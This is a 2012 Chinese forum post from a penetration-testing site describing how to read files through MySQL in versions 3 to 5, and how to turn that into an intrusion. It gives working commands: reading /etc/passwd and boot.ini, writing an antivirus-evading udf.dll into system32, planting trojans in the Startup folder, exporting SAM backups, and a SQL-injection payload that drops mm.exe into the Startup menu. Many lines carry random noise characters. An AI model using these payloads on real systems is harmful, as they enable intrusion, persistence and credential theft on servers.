中国网络渗透测试联盟

标题: mysql下读取文件的几种方式 [打印本页]

作者: admin    时间: 2012-9-13 16:34
标题: mysql下读取文件的几种方式
今天朋友问我如何在mysql下读取文件,把我问愣了,发现自己还是犯了不求甚解的毛病,因此特地查了下mysql使用手册。 & o1 K# }  T) ^' y0 [0 {* B
思路都一样,在拥有file权限的前提下,读取文件为字符串形式插入表中,然后读出表中数据,只是方式略有不同
( A  U& V4 s) ^
) ]4 j$ e* I  P; Z5 ~. F% G9 f* j2 Smysql3.x下
/ Z5 P7 K/ W' m# h+ b/ F) H% C" A  g
2 z2 U$ n* E/ ?. U/ `9 F! E不确定mysql3.x下能否使用load_file()函数(我在mysql3使用手册上没有查到,但貌似是可以的),用 load data infile 读取文件,命令如下
* {0 }, ]( N) G8 E; k* }6 U% {9 @! U
mysql>create table a (cmd text);
4 f* g& q) ?4 W6 cmysql>load data infile 'c:\\boot.ini' into table a; 8 A3 R* @  ^% l% p8 z
mysql>select * from a;
6 u; ~! W: v* `& j' m( X& J+ F% P% F; b* w2 L
mysql4.x下
7 s1 m$ f* M' C8 @: ^, }, ]6 p3 e
) p9 C4 u7 n( B, N  a6 zmysql4.x下除了 load data infile 外还可以用大家熟知的 load_file() 来读取,命令如下
* T7 B6 \' s6 t% M2 q
& I5 l; [; d5 @/ }mysql>create table a (cmd text); 1 h) f) g& w& b1 a
mysql>insert into a (cmd) values (load_file('c:\\boot.ini'));
; [' d/ G) H; ]: N% }7 L  Zmysql>select * from a; . z0 P1 R- p2 y, \% F/ Y- V. g
5 F; Z' |# a4 P. G1 R: b$ S
mysql5.x下
( F: X! f$ ]7 Y& b. R0 |
9 ?5 _: x2 d- t2 W6 M在linux下,mysql5.x 除了上面两种方法,还可以利用 system 直接执行系统命令的方式来读取文件(是否必须root身份不确定,未测试),命令如下
+ I9 g4 t. c8 u0 N. F/ W; K. l6 c" }6 C; E& V* s
mysql>system cat /etc/passwd   M8 E1 @8 d1 R# I% b. c+ B

; F2 x+ M9 G5 r! W0 V$ z5 u" u$ E! K; O0 I/ Y5 v2 {! g
mysql下读取文件在入侵中用到的时候不多,可能用于查询配置文件寻找web路径,或者webshell权限很小的时候读取其他格式的webshell内容然后用into outfile方式写入大马等,二进制文件也可以这样用,只是多了hex()和unhex()的工序。 7 G/ s0 i) R5 v) g2 D4 l. m% |- O

9 _, }0 U" u3 s, |
, ?- ]  |, x# l( \% {6 F例:把免杀过的udf.dll文件插入系统目录
# R# Q- d; k/ Q. ?9 V
6 O7 z. j1 o) U5 U7 o: W: vcreate table a (cmd LONGBLOB); ) e' |) R6 R1 u6 l( U" s
insert into a (cmd) values (hex(load_file('c:\\windows\\temp\\udf.dll')));
& P7 X) j- k, f- TSELECT unhex(cmd) FROM a INTO DUMPFILE 'c:\\windows\\system32\\udf.dll';
4 k5 w+ c2 d5 v- p+ P% [
3 C* E( K) J3 i& [5 r其他的利用方法也很多,如把木马文件写入启动项,或者把加工过的cmd.exe文件导出到系统根目录下,把sam备份导出到可读目录等等,注入中应该也可以这样用(在不知道web路径又可以导出文件的情况下),大家自由发挥吧。 $ A( v% M9 Y( M6 f/ G
7 d! ]6 s/ k  D) N& q7 v* M6 d& a
: S+ E- ~  L. k0 {* N
注入中的语法(未测试)
! r6 p; I! X' k, X! z' @& H# B
( i$ ?, s5 w" q% m. Z' I8 I- w" s/ r- U; I3 j/ y
id=xxx and 1=2 union select 1,2,3,unhex(mm.exe的十六进制),5 INTO DUMPFILE 'C:\\Documents and Settings\\All Users\\「开始」菜单\程序\启动\\mm.exe'/*




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2